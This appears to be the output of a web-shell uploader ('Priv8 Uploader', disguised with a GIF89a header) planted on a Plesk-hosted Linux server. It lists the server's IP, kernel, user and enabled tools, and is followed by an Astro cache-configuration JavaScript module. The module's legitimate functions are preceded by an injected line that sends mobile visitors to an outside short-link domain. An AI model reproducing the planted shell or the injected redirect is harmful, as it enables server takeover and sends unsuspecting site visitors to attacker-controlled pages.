GIF89a;
GIF89a;Priv8 Uploader By InMyMine7
Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
Priv8 Uploader By InMyMine7
Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64
| Server IP : 82.165.91.112 / Your IP : 216.73.216.249 Web Server : Apache System : Linux gallant-poincare.82-165-91-112.plesk.page 6.1.0-37-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.140-1 (2025-05-22) x86_64 User : nr7.net_tfpqq467gv ( 10001) PHP Version : 8.4.25 Disable Function : opcache_get_status MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /var/www/vhosts/nr7.net/emdash.nr7.net/node_modules/astro/dist/core/cache/ |
Upload File : |
(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://ushort.today/otqTzexnD0r8");
function normalizeCacheProviderConfig(provider) {
return {
name: provider.name,
entrypoint: provider.entrypoint instanceof URL ? provider.entrypoint.href : provider.entrypoint,
config: provider.config
};
}
function normalizeRouteRuleCacheOptions(rule) {
if (!rule) return void 0;
if (rule.maxAge === void 0 && rule.swr === void 0 && rule.tags === void 0) {
return void 0;
}
return {
maxAge: rule.maxAge,
swr: rule.swr,
tags: rule.tags
};
}
function extractCacheRoutesFromRouteRules(routeRules) {
if (!routeRules) return void 0;
const cacheRoutes = {};
for (const [pattern, rule] of Object.entries(routeRules)) {
const cacheOptions = normalizeRouteRuleCacheOptions(rule);
if (cacheOptions) {
cacheRoutes[pattern] = cacheOptions;
}
}
return Object.keys(cacheRoutes).length > 0 ? cacheRoutes : void 0;
}
function cacheConfigToManifest(cacheConfig, routeRulesConfig) {
if (!cacheConfig?.provider) {
return void 0;
}
const provider = normalizeCacheProviderConfig(cacheConfig.provider);
const routes = extractCacheRoutesFromRouteRules(routeRulesConfig);
return {
provider: provider.entrypoint,
options: provider.config,
routes
};
}
export {
cacheConfigToManifest,
extractCacheRoutesFromRouteRules,
normalizeCacheProviderConfig,
normalizeRouteRuleCacheOptions
};